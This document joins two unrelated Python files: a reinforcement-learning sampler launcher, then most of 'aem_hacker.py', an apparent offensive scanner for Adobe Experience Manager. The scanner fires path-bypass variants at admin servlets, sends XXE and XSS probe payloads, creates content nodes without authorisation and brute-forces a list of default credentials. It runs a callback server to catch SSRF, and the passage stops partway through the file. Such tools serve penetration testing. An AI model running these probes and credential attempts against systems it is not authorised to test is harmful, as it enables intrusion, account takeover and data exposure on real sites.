redis_prefix = None
else:
redis_server = StrictRedis(
port=config_.get("redis", {}).get("port", 12000))
redis_prefix = config_.get("redis", {}).get("prefix", "")
id = id or 0
set_global_seeds(42 + id)
if "randomized_start" in config_["env"]:
config_["env"]["randomized_start"] = (
config_["env"]["randomized_start"] and not infer)
env = environment(**config_["env"], visualize=vis)
algo_kwargs = algorithm.prepare_for_sampler(config_)
rp_params = config_.get("random_process", {})
random_process = rp.__dict__[
rp_params.pop("random_process", "RandomProcess")]
rp_params["sigma"] = action_noise
random_process = random_process(**rp_params)
seeds = config_.get("seeds", None) \
if infer \
else config_.get("train_seeds", None)
min_episode_steps = config_["sampler"].pop("min_episode_steps", None)
min_episode_steps = min_episode_steps if not infer else None
min_episode_reward = config_["sampler"].pop("min_episode_reward", None)
min_episode_reward = min_episode_reward if not infer else None
if seeds is not None:
min_episode_steps = None
min_episode_reward = None
pprint(config_["sampler"])
pprint(algo_kwargs)
sampler = Sampler(
**config_["sampler"],
**algo_kwargs,
env=env,
logdir=logdir, id=id,
redis_server=redis_server,
redis_prefix=redis_prefix,
mode="infer" if infer else "train",
random_process=random_process,
action_noise_prob=action_noise_prob,
param_noise_prob=param_noise_prob,
param_noise_d=param_noise,
seeds=seeds,
min_episode_steps=min_episode_steps,
min_episode_reward=min_episode_reward,
resume=resume)
pprint(sampler)
sampler.run()
def main(args, unknown_args):
args, config = parse_args_uargs(args, unknown_args)
os.makedirs(args.logdir, exist_ok=True)
save_config(config=config, logdir=args.logdir)
if args.expdir is not None:
modules = prepare_modules( # noqa: F841
expdir=args.expdir,
dump_dir=args.logdir)
algorithm = Registry.get_fn("algorithm", args.algorithm)
environment = Registry.get_fn("environment", args.environment)
processes = []
sampler_id = 0
def on_exit():
for p in processes:
p.terminate()
atexit.register(on_exit)
params = dict(
logdir=args.logdir,
algorithm=algorithm,
environment=environment,
config=config,
resume=args.resume,
redis=args.redis
)
if args.debug:
params_ = dict(
vis=False,
infer=False,
action_noise=0.5,
param_noise=0.5,
action_noise_prob=args.action_noise_prob,
param_noise_prob=args.param_noise_prob,
id=sampler_id,
)
run_sampler(**params, **params_)
for i in range(args.vis):
params_ = dict(
            vis=True,
            infer=True,
action_noise_prob=0,
param_noise_prob=0,
id=sampler_id,
)
p = mp.Process(target=run_sampler, kwargs=dict(**params, **params_))
p.start()
processes.append(p)
sampler_id += 1
for i in range(args.infer):
params_ = dict(
vis=False,
infer=True,
action_noise_prob=0,
param_noise_prob=0,
id=sampler_id,
)
p = mp.Process(target=run_sampler, kwargs=dict(**params, **params_))
p.start()
processes.append(p)
sampler_id += 1
for i in range(1, args.train + 1):
action_noise = args.max_action_noise * i / args.train \
if args.max_action_noise is not None \
else None
param_noise = args.max_param_noise * i / args.train \
if args.max_param_noise is not None \
else None
params_ = dict(
vis=False,
infer=False,
action_noise=action_noise,
param_noise=param_noise,
action_noise_prob=args.action_noise_prob,
param_noise_prob=args.param_noise_prob,
id=sampler_id,
)
p = mp.Process(target=run_sampler, kwargs=dict(**params, **params_))
p.start()
processes.append(p)
sampler_id += 1
for p in processes:
p.join()
if __name__ == "__main__":
args, unknown_args = parse_args()
main(args, unknown_args)
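# Example invocation (hypothetical; the algorithm/environment names must be
# registered via --expdir and the keys must match your config):
#   python run_samplers.py --config=config.yml --logdir=./logs --expdir=./src \
#       --algorithm=DDPG --environment=MyEnv --train=4 --infer=1 --vis=0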
|
aem_hacker.py
|
#! /usr/bin/env python
import concurrent.futures
import itertools
import json
import datetime
import traceback
import sys
import argparse
import base64
import time
from collections import namedtuple
from http.server import BaseHTTPRequestHandler, HTTPServer
from random import choice, randint
from string import ascii_letters
from threading import Thread
import requests
requests.packages.urllib3.disable_warnings()
CREDS = ('admin:admin',
'admin:password',
'author:author',
'grios:password',
'replication-receiver:replication-receiver',
'vgnadmin:vgnadmin')
def random_string(length=10):
return ''.join([choice(ascii_letters) for _ in range(length)])
registered = {} # Registered checks
token = random_string() # Token to recognize SSRF was triggered
d = {} # store SSRF detections
extra_headers = {}
class Detector(BaseHTTPRequestHandler):
def __init__(self, token, d, *args):
self.d = d
self.token = token
BaseHTTPRequestHandler.__init__(self, *args)
def log_message(self, format, *args):
return
def do_GET(self):
self.serve()
def do_POST(self):
self.serve()
def do_PUT(self):
self.serve()
def serve(self):
try:
token, key, value = self.path.split('/')[1:4]
except:
self.send_response(200)
return
if self.token != token:
self.send_response(200)
return
if key in self.d:
self.d[key].append(value)
else:
self.d[key] = [value, ]
self.send_response(200)
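# How SSRF detection works here: each check builds a callback URL of the form
# http://<my_host>/<token>/<check_key>/<payload>/ and tries to make the target
# fetch it. The Detector above records only hits whose token matches, appending
# the payload to the shared dict `d` under <check_key>, which the check then
# inspects after a short delay.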
def register(name):
def decorator(func):
registered[name] = func
return func
return decorator
Finding = namedtuple('Finding', 'name, url, description')
def normalize_url(base_url, path):
if base_url[-1] == '/' and (path[0] == '/' or path[0] == '\\'):
url = base_url[:-1] + path
else:
url = base_url + path
return url
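# Examples:
#   normalize_url('http://host/', '/crx/de') -> 'http://host/crx/de'
#   normalize_url('http://host', '/crx/de')  -> 'http://host/crx/de'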
def content_type(ct):
return ct.split(';')[0].lower().strip()
def error(message, **kwargs):
    print('[{}] {}'.format(datetime.datetime.now().time(), message), file=sys.stderr)
    for n, a in kwargs.items():
        print('\t{}={}'.format(n, a), file=sys.stderr)
    exc_type, exc_value, exc_traceback = sys.exc_info()
    print('Exception type: ' + str(exc_type), file=sys.stderr)
    print('Exception value: ' + str(exc_value), file=sys.stderr)
    print('TRACE:', file=sys.stderr)
    traceback.print_tb(exc_traceback, file=sys.stderr)
    print('\n\n\n', file=sys.stderr)
def http_request(url, method='GET', data=None, additional_headers=None, proxy=None, debug=False):
headers = {'User-Agent': 'curl/7.30.0'}
if additional_headers:
headers.update(additional_headers)
if extra_headers:
headers.update({
# Retrieve the headers configured as extra headers but not controlled
# by the application in this specific request
h_name: h_value
for h_name, h_value in extra_headers.items()
if h_name not in headers
})
if not proxy:
proxy = {}
if debug:
print('>> Sending {} {}'.format(method, url))
resp = requests.request(method, url, data=data, headers=headers, proxies=proxy, verify=False, timeout=40, allow_redirects=False)
if debug:
        print('<< Received HTTP-{}'.format(resp.status_code))
return resp
def http_request_multipart(url, method='POST', data=None, additional_headers=None, proxy=None, debug=False):
headers = {'User-Agent': 'curl/7.30.0'}
if additional_headers:
headers.update(additional_headers)
if extra_headers:
headers.update({
# Retrieve the headers configured as extra headers but not controlled
# by the application in this specific request
h_name: h_value
for h_name, h_value in extra_headers.items()
if h_name not in headers
})
if not proxy:
proxy = {}
if debug:
print('>> Sending {} {}'.format(method, url))
resp = requests.request(method, url, files=data, headers=headers, proxies=proxy, verify=False, timeout=40, allow_redirects=False)
if debug:
        print('<< Received HTTP-{}'.format(resp.status_code))
return resp
def preflight(url, proxy=None, debug=False):
try:
http_request(url, proxy=proxy, debug=debug)
except:
return False
else:
return True
@register('set_preferences')
def exposed_set_preferences(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
SETPREFERENCES = itertools.product(('/crx/de/setPreferences.jsp', '///crx///de///setPreferences.jsp'),
(';%0a{0}.html', '/{0}.html'),
('?keymap=<1337>&language=0',))
SETPREFERENCES = list('{0}{1}{2}'.format(p1, p2.format(r), p3) for p1, p2, p3 in SETPREFERENCES)
results = []
for path in SETPREFERENCES:
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy)
if resp.status_code == 400:
if '<1337>' in resp.content.decode():
f = Finding('SetPreferences', url,
'Page setPreferences.jsp is exposed, XSS might be possible via keymap parameter.')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_set_preferences', url=url)
return results
@register('merge_metadata')
def exposed_merge_metadata(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
MERGEMETADATA = itertools.product(('/libs/dam/merge/metadata', '///libs///dam///merge///metadata'),
('.html', '.css/{0}.html', '.ico/{0}.html', '....4.2.1....json/{0}.html',
'.css;%0a{0}.html', '.ico;%0a{0}.html'),
('?path=/etc&.ico',))
MERGEMETADATA = list('{0}{1}{2}'.format(p1, p2.format(r), p3) for p1, p2, p3 in MERGEMETADATA)
results = []
for path in MERGEMETADATA:
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy)
if resp.status_code == 200:
try:
json.loads(resp.content.decode())['assetPaths']
except:
pass
else:
f = Finding('MergeMetadataServlet', url,
'MergeMetadataServlet is exposed, XSS might be possible via path parameter.')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_merge_metadata', url=url)
return results
@register('get_servlet')
def exposed_get_servlet(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
GETSERVLET = itertools.product(('/', '/etc', '/var', '/apps', '/home', '///etc', '///var', '///apps', '///home'),
('', '.children'),
('.json', '.1.json', '....4.2.1....json', '.json?{0}.css', '.json?{0}.ico', '.json?{0}.html',
'.json/{0}.css', '.json/{0}.html', '.json/{0}.png', '.json/{0}.ico',
'.json;%0a{0}.css', '.json;%0a{0}.png', '.json;%0a{0}.html', '.json;%0a{0}.ico'))
GETSERVLET = list('{0}{1}{2}'.format(p1, p2, p3.format(r)) for p1, p2, p3 in GETSERVLET)
results = []
for path in GETSERVLET:
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy)
if resp.status_code == 200:
try:
json.loads(resp.content.decode())
                    if 'jcr:primaryType' not in resp.content.decode():
raise Exception()
except:
pass
else:
f = Finding('DefaultGetServlet', url,
'Sensitive information might be exposed via AEM\'s DefaultGetServlet. '
'Check child nodes manually for secrets exposed, see - '
'https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43')
results.append(f)
except:
if debug:
error('Exception while performing a check', check='exposed_get_servlet', url=url)
return results
@register('querybuilder_servlet')
def exposed_querybuilder_servlet(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
QUERYBUILDER = itertools.product(('/bin/querybuilder.json', '///bin///querybuilder.json', '/bin/querybuilder.feed', '///bin///querybuilder.feed'),
('', '.css', '.ico', '.png', '.gif', '.html', '.1.json', '....4.2.1....json',
';%0a{0}.css', ';%0a{0}.png', ';%0a{0}.html', ';%0a{0}.ico', '.ico;%0a{0}.ico',
'.css;%0a{0}.css', '.html;%0a{0}.html', '?{0}.css', '?{0}.ico'))
QUERYBUILDER = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in QUERYBUILDER)
results = []
found_json = False
found_feed = False
for path in QUERYBUILDER:
if found_feed and found_json:
break
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy)
if resp.status_code == 200:
try:
json.loads(resp.content.decode())['hits']
except:
pass
else:
if found_json:
continue
f = Finding('QueryBuilderJsonServlet', url,
'Sensitive information might be exposed via AEM\'s QueryBuilderJsonServlet. '
'See - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html')
results.append(f)
found_json = True
if '</feed>' in str(resp.content):
if found_feed:
continue
f = Finding('QueryBuilderFeedServlet', url,
'Sensitive information might be exposed via AEM\'s QueryBuilderFeedServlet. '
'See - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html')
results.append(f)
found_feed = True
except:
if debug:
error('Exception while performing a check', check='exposed_querybuilder_servlet', url=url)
return results
@register('gql_servlet')
def exposed_gql_servlet(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
GQLSERVLET = itertools.product(('/bin/wcm/search/gql', '///bin///wcm///search///gql'),
('.json', '....1....json', '.json/{0}.css', '.json/{0}.html', '.json/{0}.ico', '.json/{0}.png',
'.json;%0a{0}.css', '.json;%0a{0}.ico', '.json;%0a{0}.html', '.json;%0a{0}.png'),
('?query=type:User%20limit:..1&pathPrefix=&p.ico',))
GQLSERVLET = list('{0}{1}{2}'.format(p1, p2.format(r), p3) for p1, p2, p3 in GQLSERVLET)
results = []
for path in GQLSERVLET:
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy)
if resp.status_code == 200:
try:
json.loads(resp.content.decode())['hits']
except:
pass
else:
f = Finding('GQLServlet', url,
'Sensitive information might be exposed via AEM\'s GQLServlet. '
'See - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/reference-materials/javadoc/index.html?org/apache/jackrabbit/commons/query/GQL.html')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_gql_servlet', url=url)
return results
@register('guide_internal_submit_servlet')
def exposed_guide_internal_submit_servlet_xxe(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
GuideInternalSubmitServlet = itertools.product(('/content/forms/af/geometrixx-gov/application-for-assistance/jcr:content/guideContainer',
'/content/forms/af/geometrixx-gov/geometrixx-survey-form/jcr:content/guideContainer',
'/content/forms/af/geometrixx-gov/hardship-determination/jcr:content/guideContainer',
'/libs/fd/af/components/guideContainer/cq:template',
'///libs///fd///af///components///guideContainer///cq:template',
'/libs/fd/af/templates/simpleEnrollmentTemplate2/jcr:content/guideContainer',
'///libs///fd///af///templates///simpleEnrollmentTemplate2///jcr:content///guideContainer',
'/libs/fd/af/templates/surveyTemplate2/jcr:content/guideContainer',
'///libs///fd///af///templates///surveyTemplate2///jcr:content///guideContainer',
'/libs/fd/af/templates/blankTemplate2/jcr:content/guideContainer',
'///libs///fd///af///templates///blankTemplate2///jcr:content///guideContainer',
                                                    '/libs/fd/af/templates/surveyTemplate/jcr:content/guideContainer',
'///libs///fd///af///templates///surveyTemplate///jcr:content///guideContainer',
'/libs/fd/af/templates/tabbedEnrollmentTemplate/jcr:content/guideContainer',
'///libs///fd///af///templates///tabbedEnrollmentTemplate///jcr:content///guideContainer',
'/libs/fd/af/templates/tabbedEnrollmentTemplate2/jcr:content/guideContainer',
'///libs///fd///af///templates///tabbedEnrollmentTemplate2///jcr:content///guideContainer',
'/libs/fd/af/templates/simpleEnrollmentTemplate/jcr:content/guideContainer',
'///libs///fd///af///templates///simpleEnrollmentTemplate///jcr:content///guideContainer',
'/libs/settings/wcm/template-types/afpage/initial/jcr:content/guideContainer',
'///libs///settings///wcm///template-types///afpage///initial///jcr:content///guideContainer',
'/libs/settings/wcm/template-types/afpage/structure/jcr:content/guideContainer',
'///libs///settings///wcm///template-types///afpage///structure///jcr:content///guideContainer',
'/apps/geometrixx-gov/templates/enrollment-template/jcr:content/guideContainer',
'/apps/geometrixx-gov/templates/survey-template/jcr:content/guideContainer',
'/apps/geometrixx-gov/templates/tabbed-enrollment-template/jcr:content/guideContainer'),
('.af.internalsubmit.json', '.af.internalsubmit.1.json', '.af.internalsubmit...1...json',
'.af.internalsubmit.html', '.af.internalsubmit.js', '.af.internalsubmit.css',
'.af.internalsubmit.ico', '.af.internalsubmit.png', '.af.internalsubmit.gif',
'.af.internalsubmit.svg', '.af.internalsubmit.ico;%0a{0}.ico',
'.af.internalsubmit.html;%0a{0}.html', '.af.internalsubmit.css;%0a{0}.css'))
GuideInternalSubmitServlet = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in GuideInternalSubmitServlet)
results = []
for path in GuideInternalSubmitServlet:
url = normalize_url(base_url, path)
try:
data = 'guideState={"guideState"%3a{"guideDom"%3a{},"guideContext"%3a{"xsdRef"%3a"","guidePrefillXml"%3a"<afData>\u0041\u0042\u0043</afData>"}}}'
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url}
resp = http_request(url, 'POST', data=data, additional_headers=headers, proxy=proxy)
if resp.status_code == 200 and '<afData>ABC' in str(resp.content):
f = Finding('GuideInternalSubmitServlet', url,
'GuideInternalSubmitServlet is exposed, XXE is possible.')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_guide_internal_submit_servlet_xxe', url=url)
return results
@register('post_servlet')
def exposed_post_servlet(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
POSTSERVLET = itertools.product(('/', '/content', '/content/dam'),
('.json', '.1.json', '...4.2.1...json', '.json/{0}.css', '.json/{0}.html',
'.json;%0a{0}.css', '.json;%0a{0}.html'))
POSTSERVLET = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in POSTSERVLET)
results = []
for path in POSTSERVLET:
url = normalize_url(base_url, path)
try:
data = ':operation=nop'
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url}
resp = http_request(url, 'POST', data=data, additional_headers=headers, proxy=proxy, debug=debug)
if resp.status_code == 200 and 'Null Operation Status:' in str(resp.content):
f = Finding('POSTServlet', url,
                            'POSTServlet is exposed; persistent XSS or RCE might be possible, depending on your privileges.')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_post_servlet', url=url)
return results
@register('create_new_nodes')
def create_new_nodes(base_url, my_host, debug=False, proxy=None):
CREDS = ('admin:admin', 'author:author', 'admin:password')
nodename1 = random_string()
r1 = random_string(3)
POSTSERVLET1 = itertools.product(('/content/usergenerated/etc/commerce/smartlists/', '/content/usergenerated/'),
('*', '{0}.json', '{0}.1.json', '{0}.json/{1}.css', '{0}.json/{1}.html',
'{0}.json/{1}.ico', '{0}.json/{1}.png', '{0}.json/{1}.1.json',
'{0}.json;%0a{1}.css', '{0}.json;%0a{1}.html', '{0}.json;%0a{1}.png',
'{0}.json;%0a{1}.ico', '{0}....4.2.1....json', '{0}?{1}.ico',
'{0}?{1}.css', '{0}?{1}.html', '{0}?{1}.json', '{0}?{1}.1.json',
'{0}?{1}....4.2.1....json'))
POSTSERVLET1 = list('{0}{1}'.format(p1, p2.format(nodename1, r1)) for p1, p2 in POSTSERVLET1)
nodename2 = random_string()
r2 = random_string(3)
POSTSERVLET2 = itertools.product(('/', '/content/', '/apps/', '/libs/'),
('*', '{0}.json', '{0}.1.json', '{0}.json/{1}.css',
'{0}.json/{1}.html', '{0}.json/{1}.ico', '{0}.json/{1}.png',
'{0}.json/{1}.1.json', '{0}.json;%0a{1}.css', '{0}.json;%0a{1}.html',
'{0}.json;%0a{1}.png', '{0}.json;%0a{1}.ico', '{0}....4.2.1....json',
'{0}?{1}.ico', '{0}?{1}.css', '{0}?{1}.html', '{0}?{1}.json',
'{0}?{1}.1.json', '{0}?{1}....4.2.1....json'))
POSTSERVLET2 = list('{0}{1}'.format(p1, p2.format(nodename2, r2)) for p1, p2 in POSTSERVLET2)
results = []
for path in POSTSERVLET1:
url = normalize_url(base_url, path)
try:
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url}
resp = http_request(url, 'POST', additional_headers=headers, proxy=proxy)
if '<td>Parent Location</td>' in str(resp.content) and resp.status_code in [200, 201]:
f = Finding('CreateJCRNodes', url,
                            'It\'s possible to create new JCR nodes using the POST Servlet as an anonymous user. '
                            'You might get persistent XSS or perform other attacks by accessing servlets registered by Resource Type.')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='create_new_nodes', url=url)
for path, creds in itertools.product(POSTSERVLET2, CREDS):
url = normalize_url(base_url, path)
try:
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url,
'Authorization': 'Basic {}'.format(base64.b64encode(creds.encode()).decode())}
data = 'a=b'
resp = http_request(url, 'POST', data=data, additional_headers=headers, proxy=proxy)
if '<td>Parent Location</td>' in str(resp.content) and resp.status_code in [200, 201]:
f = Finding('CreateJCRNodes', url,
'It\'s possible to create new JCR nodes using POST Servlet as "{0}" user. '
'You might get persistent XSS or RCE.'.format(creds))
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='create_new_nodes', url=url)
return results
@register('create_new_nodes2')
def create_new_nodes2(base_url, my_host, debug=False, proxy=None):
CREDS = ('admin:admin', 'author:author', 'admin:password', 'grios:password', '[email protected]:aparker', '[email protected]:jdoe',
'[email protected]:password', '[email protected]:password',
'[email protected]:password', '[email protected]:password')
nodename = random_string()
r = random_string(3)
POSTSERVLET = itertools.product(('/home/users/geometrixx/{0}/', ),
('*', '{0}.json', '{0}.1.json', '{0}.json/{1}.css',
'{0}.json/{1}.html', '{0}.json/{1}.ico', '{0}.json/{1}.png',
'{0}.json/{1}.1.json', '{0}.json;%0a{1}.css', '{0}.json;%0a{1}.html',
'{0}.json;%0a{1}.png', '{0}.json;%0a{1}.ico',
'{0}....4.2.1....json', '{0}?{1}.ico', '{0}?{1}.css',
'{0}?{1}.html', '{0}?{1}.json', '{0}?{1}.1.json',
'{0}?{1}....4.2.1....json'))
POSTSERVLET = list('{0}{1}'.format(p1, p2.format(nodename, r)) for p1, p2 in POSTSERVLET)
results = []
for path, creds in itertools.product(POSTSERVLET, CREDS):
path = path.format(creds.split(':')[0])
url = normalize_url(base_url, path)
try:
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url,
'Authorization': 'Basic {}'.format(base64.b64encode(creds.encode()).decode())}
data = 'a=b'
resp = http_request(url, 'POST', data=data, additional_headers=headers, proxy=proxy)
if '<td>Parent Location</td>' in str(resp.content) and resp.status_code in [200, 201]:
f = Finding('CreateJCRNodes 2', url,
                            'It\'s possible to create new JCR nodes using the POST Servlet as Geometrixx user "{0}". '
                            'You might get persistent XSS or perform other attacks by accessing servlets registered by Resource Type.'.format(creds))
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='create_new_nodes2', url=url)
return results
@register('loginstatus_servlet')
def exposed_loginstatus_servlet(base_url, my_host, debug=False, proxy=None):
global CREDS
r = random_string(3)
LOGINSTATUS = itertools.product(('/system/sling/loginstatus', '///system///sling///loginstatus'),
('.json', '.css', '.ico', '.png', '.gif', '.html', '.js', '.json/{0}.1.json',
'.json;%0a{0}.css', '.json;%0a{0}.html', '.json;%0a{0}.png',
'.json;%0a{0}.ico', '...4.2.1...json'))
LOGINSTATUS = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in LOGINSTATUS)
results = []
for path in LOGINSTATUS:
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy, debug=debug)
if resp.status_code == 200 and 'authenticated=' in str(resp.content):
f = Finding('LoginStatusServlet', url,
                            'LoginStatusServlet is exposed; it allows brute-forcing credentials. '
'You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node.')
results.append(f)
for creds in CREDS:
headers = {'Authorization': 'Basic {}'.format(base64.b64encode(creds.encode()).decode())}
resp = http_request(url, additional_headers=headers, proxy=proxy, debug=debug)
if 'authenticated=true' in str(resp.content):
f = Finding('AEM with default credentials', url,
'AEM with default credentials "{0}".'.format(creds))
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_loginstatus_servlet', url=url)
return results
#@register('currentuser_servlet')
def exposed_currentuser_servlet(base_url, my_host, debug=False, proxy=None):
global CREDS
r = random_string(3)
CURRENTUSER = itertools.product(('/libs/granite/security/currentuser', '///libs///granite///security///currentuser'),
('.json', '.css', '.ico', '.png', '.gif', '.html', '.js', '.json?{0}.css',
'.json/{0}.1.json', '.json;%0a{0}.css', '.json;%0a{0}.html', '.json;%0a{0}.js',
'.json;%0a{0}.ico', '...4.2.1...json'))
CURRENTUSER = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in CURRENTUSER)
results = []
for path in CURRENTUSER:
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy, debug=debug)
if resp.status_code == 200 and 'authorizableId' in str(resp.content):
f = Finding('CurrentUserServlet', url,
                            'CurrentUserServlet is exposed; it allows brute-forcing credentials. '
'You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node.')
results.append(f)
for creds in CREDS:
headers = {'Authorization': 'Basic {}'.format(base64.b64encode(creds.encode()).decode())}
resp = http_request(url, additional_headers=headers, proxy=proxy, debug=debug)
if 'anonymous' not in str(resp.content):
f = Finding('AEM with default credentials', url,
'AEM with default credentials "{0}".'.format(creds))
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_currentuser_servlet', url=url)
return results
@register('userinfo_servlet')
def exposed_userinfo_servlet(base_url, my_host, debug=False, proxy=None):
global CREDS
r = random_string(3)
USERINFO = itertools.product(('/libs/cq/security/userinfo', '///libs///cq///security///userinfo'),
('.json', '.css', '.ico', '.png', '.gif', '.html', '.js',
'.json?{0}.css', '.json/{0}.1.json',
'.json;%0a{0}.css', '.json;%0a{0}.html',
'.json;%0a{0}.ico', '...4.2.1...json'))
USERINFO = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in USERINFO)
results = []
for path in USERINFO:
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy, debug=debug)
if resp.status_code == 200 and 'userID' in str(resp.content):
f = Finding('UserInfoServlet', url,
                            'UserInfoServlet is exposed; it allows brute-forcing credentials. '
'You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node.')
results.append(f)
for creds in CREDS:
headers = {'Authorization': 'Basic {}'.format(base64.b64encode(creds.encode()).decode())}
resp = http_request(url, additional_headers=headers, proxy=proxy, debug=debug)
if 'anonymous' not in str(resp.content):
f = Finding('AEM with default credentials', url,
'AEM with default credentials "{0}".'.format(creds))
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_userinfo_servlet', url=url)
return results
@register('felix_console')
def exposed_felix_console(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
FELIXCONSOLE = itertools.product(('/system/console/bundles', '///system///console///bundles'),
('', '.json', '.1.json', '.4.2.1...json', '.css', '.ico', '.png', '.gif', '.html', '.js',
';%0a{0}.css', ';%0a{0}.html', ';%0a{0}.png', '.json;%0a{0}.ico', '.servlet/{0}.css',
'.servlet/{0}.js', '.servlet/{0}.html', '.servlet/{0}.ico'))
FELIXCONSOLE = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in FELIXCONSOLE)
results = []
for path in FELIXCONSOLE:
url = normalize_url(base_url, path)
headers = {'Authorization': 'Basic YWRtaW46YWRtaW4='}
try:
resp = http_request(url, additional_headers=headers, proxy=proxy, debug=debug)
if resp.status_code == 200 and 'Web Console - Bundles' in str(resp.content):
f = Finding('FelixConsole', url,
                            'Felix Console is exposed; you may get RCE by installing an OSGI bundle. '
'See - https://github.com/0ang3el/aem-rce-bundle')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_felix_console', url=url)
return results
@register('wcmdebug_filter')
def exposed_wcmdebug_filter(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
WCMDEBUG = itertools.product(('/', '/content', '/content/dam'),
('.json', '.1.json', '...4.2.1...json', '.json/{0}.css',
'.json/{0}.html', '.json/{0}.ico', '.json;%0a{0}.css', '.json;%0a{0}.html', '.json;%0a{0}.ico'),
('?debug=layout',))
WCMDEBUG = list('{0}{1}{2}'.format(p1, p2.format(r), p3) for p1, p2, p3 in WCMDEBUG)
results = []
for path in WCMDEBUG:
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy, debug=debug)
if resp.status_code == 200 and 'res=' in str(resp.content) and 'sel=' in str(resp.content):
f = Finding('WCMDebugFilter', url,
'WCMDebugFilter exposed and might be vulnerable to reflected XSS (CVE-2016-7882). '
'See - https://medium.com/@jonathanbouman/reflected-xss-at-philips-com-e48bf8f9cd3c')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_wcmdebug_filter', url=url)
return results
@register('wcmsuggestions_servlet')
def exposed_wcmsuggestions_servlet(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
WCMSUGGESTIONS = itertools.product(('/bin/wcm/contentfinder/connector/suggestions', '///bin///wcm///contentfinder///connector///suggestions'),
('.json', '.css', '.html', '.ico', '.png', '.gif', '.json/{0}.1.json',
'.json;%0a{0}.css', '.json/{0}.css', '.json/{0}.ico',
'.json/{0}.html', '...4.2.1...json'),
('?query_term=path%3a/&pre=<1337abcdef>&post=yyyy',))
WCMSUGGESTIONS = list('{0}{1}{2}'.format(p1, p2.format(r), p3) for p1, p2, p3 in WCMSUGGESTIONS)
results = []
for path in WCMSUGGESTIONS:
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy, debug=debug)
if resp.status_code == 200 and '<1337abcdef>' in str(resp.content):
f = Finding('WCMSuggestionsServlet', url,
'WCMSuggestionsServlet exposed and might result in reflected XSS. '
'See - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=96')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_wcmsuggestions_servlet', url=url)
return results
@register('crxde_crx')
def exposed_crxde_crx(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
CRXDELITE = itertools.product(('/crx/de/index.jsp', '///crx///de///index.jsp'),
('', ';%0a{0}.css', ';%0a{0}.html', ';%0a{0}.js', ';%0a{0}.ico', '?{0}.css',
'?{0}.html', '?{0}.ico'))
CRXDELITE = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in CRXDELITE)
CRX = itertools.product(('/crx/explorer/browser/index.jsp', '///crx///explorer///browser///index.jsp'),
('', ';%0a{0}.css', ';%0a{0}.html', ';%0a{0}.ico', '?{0}.css',
'?{0}.html', '?{0}.ico'))
CRX = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in CRX)
CRXSEARCH = itertools.product(('/crx/explorer/ui/search.jsp', '/crx///explorer///ui///search.jsp'),
('', ';%0a{0}.css', ';%0a{0}.html', ';%0a{0}.ico',
'?{0}.css', '?{0}.html', '?{0}.ico'))
CRXSEARCH = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in CRXSEARCH)
CRXNAMESPACE = itertools.product(('/crx/explorer/ui/namespace_editor.jsp', '///crx/explorer///ui///namespace_editor.jsp'),
('', ';%0a{0}.css', ';%0a{0}.html', ';%0a{0}.ico', '?{0}.css',
'?{0}.html', '?{0}.ico')
)
CRXNAMESPACE = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in CRXNAMESPACE)
